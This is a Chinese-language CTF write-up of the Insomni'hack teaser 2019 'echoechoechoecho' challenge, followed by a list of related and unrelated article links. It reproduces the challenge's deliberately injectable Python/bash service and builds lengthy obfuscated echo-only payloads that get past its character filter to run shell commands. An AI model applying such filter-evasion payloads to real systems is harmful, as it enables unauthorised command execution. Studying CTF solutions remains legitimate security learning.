参考链接

https://ctftime.org/task/7456

题目内容

Echo echo echo echo, good luck

nc 35.246.181.187 1337

解题过程

主要思路是通过精巧的构造绕过过滤。

源代码如下:

#!/usr/bin/env python3

from os import close

from random import choice

import re

from signal import alarm

from subprocess import check_output

from termcolor import colored

alarm(10)

colors = ["red","blue","green","yellow","magenta","cyan","white"]

# thanks http://patorjk.com/software/taag/#p=display&h=0&f=Crazy&t=echo

banner = """

                            _..._                 .-'''-.

                         .-'_..._''.             '   _    \\

       __.....__       .' .'      '.\  .       /   /` '.   \\

   .-''         '.    / .'           .'|      .   |     \  '

  /     .-''"'-.  `. . '            <  |      |   '      |  '

 /     /________\   \| |             | |      \    \     / /

 |                  || |             | | .'''-.`.   ` ..' /

 \    .-------------'. '             | |/.'''. \  '-...-'`

  \    '-.____...---. \ '.          .|  /    | |

   `.             .'   '. `._____.-'/| |     | |

     `''-...... -'       `-.______ / | |     | |

                                  `  | '.    | '.

                                     '---'   '---'

"""

def bye(s=""):

    print(s)

    print("bye")

    exit()

def check_input(payload):

    if payload == 'thisfile':

        bye(open("/bin/shell").read())

    if not all(ord(c) < 128 for c in payload):

        bye("ERROR ascii only pls")

    if re.search(r'[^();+$\\= \']', payload.replace("echo", "")):

        bye("ERROR invalid characters")

    # real echolords probably wont need more special characters than this

    if payload.count("+") > 1 or \

            payload.count("'") > 1 or \

            payload.count(")") > 1 or \

            payload.count("(") > 1 or \

            payload.count("=") > 2 or \

            payload.count(";") > 3 or \

            payload.count(" ") > 30:

        bye("ERROR Too many special chars.")

    return payload

print(colored(banner, choice(colors)))

print("Hi, what would you like to echo today? (make sure to try 'thisfile')")

payload = check_input(input())

print("And how often would you like me to echo that?")

count = max(min(int(input()), 10), 0)

payload += "|bash"*count

close(0)

result = check_output(payload, shell=True, executable="/bin/bash")

bye(result.decode())

Payload只能包含部分特殊符号加上echo, 并且有些特殊符号的使用次数有限制。

下面先演示下如何构造ls

ls | bash

等价于下面

echo $'\154\163' | bash

等价于下面

echo echo \$\'\\$(($((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10==10))+$((10==10))+$((10==10))+$((10==10))))\\$(($((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10==10))+$((10==10))+$((10==10))))\'

等价于下面。做这道题的时候$$的值为10。

echoecho=\; echoechoecho=\( echoechoechoecho=\) echoechoechoechoecho=\+ echoechoechoechoechoecho=\'; echo echo echo \\$\\$echoechoechoechoechoecho\\\\\$$echoechoecho$echoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$==$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$==$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$==$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$==$$$echoechoechoecho$echoechoechoecho$echoechoechoecho$echoechoechoecho\\\\\$$echoechoecho$echoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$==$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$==$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$==$$$echoechoechoecho$echoechoechoecho$echoechoechoecho$echoechoechoecho\\$echoechoechoechoechoecho

等价于下面

echo=\=;echo echoecho$echo\\\; echoechoecho$echo\\\( echoechoechoecho$echo\\\) echoechoechoechoecho$echo\\\+ echoechoechoechoechoecho$echo\\\'\; echo echo echo \\\\$\\\\\$echoechoechoechoechoecho\\\\\\\\\\$\$echoechoecho\$echoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$$echo$echo\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$$echo$echo\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$$echo$echo\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$$echo$echo\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoecho\$echoechoechoecho\\\\\\\\\\$\$echoechoecho\$echoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$$echo$echo\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$$echo$echo\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$$echo$echo\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoecho\$echoechoechoecho\\\\\$echoechoechoechoechoecho

Insomni'hack teaser 2019 - Misc - echoechoechoecho的更多相关文章

  1. Insomni'hack teaser 2019 - Misc - curlpipebash

    参考链接 https://ctftime.org/task/7454 题目 Welcome to Insomni'hack teaser 2019! Execute this Bash command ...

  2. Insomni'hack teaser 2019 - Pwn - 1118daysober

    参考链接 https://ctftime.org/task/7459 Linux内核访问用户空间文件:get_fs()/set_fs()的使用 漏洞的patch信息 https://maltekrau ...

  3. Insomni'hack teaser 2019 - Reverse - beginner_reverse

    参考链接 https://ctftime.org/task/7455 题目描述 A babyrust to become a hardcore reverser 点我下载 解题过程 一道用rust写的 ...

  4. Insomni’hack CTF-l33t-hoster复现分析

    题目地址: https://github.com/eboda/insomnihack/tree/master/l33t_hoster 源码如下: <?php if (isset($_GET[&q ...

  5. CTF各种资源:题目、工具、资料

    目录 题目汇总 Reverse 签到题 Web Web中等难度 Crypto 基础网站 各类工具 综合 Web Payloads 逆向 Pwn 取证 题目汇总 这里收集了我做过的CTF题目 Rever ...

  6. Kangax 的 ES7 兼容性表格

    Kangax 的 ES7 兼容性表格 https://kangax.github.io/compat-table/es2016plus/ Sort by             Engine type ...

  7. 2019年上海市大学生网络安全大赛两道misc WriteUp

    2019年全国大学生网络安全邀请赛暨第五届上海市大学生网络安全大赛 做出了两道Misc== 签到 题干 解题过程 题干提示一直注册成功,如果注册失败也许会出现flag. 下载下来是包含010edito ...

  8. 2019强网杯部分misc&web

    0x01 前言 前两天菜鸡+x和几个大哥算是正式参加了一次ctf的线上赛,也是第一次参加这种比赛(前一段时间巨佬也给了我们一个西班牙的比赛,不过不算是正式参赛,做题的时候,比赛已经结束了),没想到出师 ...

  9. Hack The Box Web Pentest 2019

    [20 Points] Emdee five for life [by L4mpje] 问题描述: Can you encrypt fast enough? 初始页面,不管怎么样点击Submit都会显 ...

随机推荐

  1. @清晰掉 c语言三"巨头" const:volatile:static

    const: 1.如果把const放在变量类型前,说明这个变量的值是保持不变的(即为常量),改变量必须在定义时初始化,初始化后对她的任何赋值都是非法的. 2.当指针或是引用指向一个常量时,必须在类型名 ...

  2. SecureCRT使用+堡垒机简单使用

    写在前面的话 自从升级为宝妈后,回来发现好多东西都遗忘了.熟话说:好记性不如烂笔头,我还是记录下来吧. 堡垒机使用的几个技巧 1.快捷操作         1) 输入 ID 直接登录.         ...

  3. leetcode-mid-backtracking -46. Permutations-NO

    mycode 没有通过,其实只需要把temp.append改为temp+[nums[i]]即可 def permute(nums): def dfs(res,nums,temp): print(num ...

  4. c# SQLite 判断表、字段是否存在的方法,新增、删除、重命名列

    SQLiteHelper class: using System; using System.Collections.Generic; using System.Text; using System. ...

  5. eclipse + MinGW搭建C/C++环境

    Eclipse+CDT+MinGW 配置 C/C++ 开发环境 开场白:谨以此文献给所有喜欢探索和热爱开源软件的朋友们. 1:首先你得有 JAVA 运行环境,这样你才可以运行eclipse ,你可以到 ...

  6. 码云 git 命令提交

    E:\project\eddy-boot-focus>git init E:\project\eddy-boot-focus>git remote add origin https://g ...

  7. centos7:storm集群环境搭建

    1.安装storm 下载storm安装包 在线下载 wget http://apache.fayea.com/storm/apache-storm-1.1.1/apache-storm-1.1.1.t ...

  8. pandas中.value_counts()的用法

    原文链接:https://www.jianshu.com/p/f773b4b82c66 value_counts()是一种查看表格某列中有多少个不同值的快捷方法,并计算每个不同值有在该列中有多少重复值 ...

  9. Chapter02 第一节 开始学习C++

    2.1 进入C++ 第一个示例程序: //myfirst.cpp #include <bits/stdc++.h> using namespace std; int main() { co ...

  10. Scrapy 教程(五)-分页策略

    scrapy 爬取分页网站的策略 1. 检测当前页是否存在“下一页” 2. 如果存在,把“下一页”的链接交给本方法或者其他方法 3. 如果不存在,结束 图示 示例代码 def parse(self, ...